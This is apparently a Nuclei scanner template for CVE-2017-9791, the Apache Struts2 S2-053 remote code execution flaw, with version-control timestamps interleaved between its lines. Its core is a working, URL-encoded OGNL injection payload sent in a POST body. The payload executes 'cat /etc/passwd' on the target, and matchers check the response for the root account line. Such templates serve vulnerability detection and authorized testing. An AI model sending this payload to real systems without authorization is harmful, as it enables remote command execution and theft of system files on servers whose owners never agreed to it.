2021-02-21 15:39:29 +00:00
id : CVE-2017-9791
info :
2022-05-12 14:04:18 +00:00
name : Apache Struts2 S2-053 - Remote Code Execution
2021-02-21 15:39:29 +00:00
author : pikpikcu
severity : critical
2022-05-12 14:04:18 +00:00
description : Apache Struts 2.1.x and 2.3.x with the Struts 1 plugin might allow remote code execution via a malicious field value passed in a raw message to the ActionMessage.
2021-08-18 11:37:49 +00:00
reference :
2021-04-18 13:00:27 +00:00
- http://www.oracle.com/technetwork/security-advisory/alert-cve-2017-9805-3889403.html
- http://struts.apache.org/docs/s2-048.html
2022-07-01 10:02:07 +00:00
- http://web.archive.org/web/20211207175819/https://securitytracker.com/id/1038838
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2021-09-10 11:26:40 +00:00
cve-id : CVE-2017-9791
cwe-id : CWE-20
2022-07-21 17:18:22 +00:00
tags : cve,cve2017,apache,rce,struts,kev
2021-02-21 15:39:29 +00:00
requests :
- method : POST
path :
- "{{BaseURL}}/integration/saveGangster.action"
headers :
Content-Type : application/x-www-form-urlencoded
body : |
name=%25%7b%28%23%64%6d%3d%40%6f%67%6e%6c%2e%4f%67%6e%6c%43%6f%6e%74%65%78%74%40%44%45%46%41%55%4c%54%5f%4d%45%4d%42%45%52%5f%41%43%43%45%53%53%29%2e%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%3f%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%3d%23%64%6d%29%3a%28%28%23%63%6f%6e%74%61%69%6e%65%72%3d%23%63%6f%6e%74%65%78%74%5b%27%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%41%63%74%69%6f%6e%43%6f%6e%74%65%78%74%2e%63%6f%6e%74%61%69%6e%65%72%27%5d%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%3d%23%63%6f%6e%74%61%69%6e%65%72%2e%67%65%74%49%6e%73%74%61%6e%63%65%28%40%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%6f%67%6e%6c%2e%4f%67%6e%6c%55%74%69%6c%40%63%6c%61%73%73%29%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%2e%67%65%74%45%78%63%6c%75%64%65%64%50%61%63%6b%61%67%65%4e%61%6d%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%2e%67%65%74%45%78%63%6c%75%64%65%64%43%6c%61%73%73%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%63%6f%6e%74%65%78%74%2e%73%65%74%4d%65%6d%62%65%72%41%63%63%65%73%73%28%23%64%6d%29%29%29%29%2e%28%23%71%3d%40%6f%72%67%2e%61%70%61%63%68%65%2e%63%6f%6d%6d%6f%6e%73%2e%69%6f%2e%49%4f%55%74%69%6c%73%40%74%6f%53%74%72%69%6e%67%28%40%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%40%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%27%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%27%29%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%29%29%2e%28%23%71%29%7d&age=10&__checkbox_bustedBefore=true&description=
matchers-condition : and
matchers :
- type : word
2022-05-12 14:04:18 +00:00
part : header
2021-02-21 15:39:29 +00:00
words :
- "Content-Type: text/html"
- type : regex
2022-05-12 14:04:18 +00:00
part : body
2021-02-21 15:39:29 +00:00
regex :
2022-03-22 08:01:31 +00:00
- "root:.*:0:0:"
2021-02-21 15:39:29 +00:00
condition : and
- type : status
status :
- 200
2022-05-12 14:04:18 +00:00
# Enhanced by mp on 2022/05/11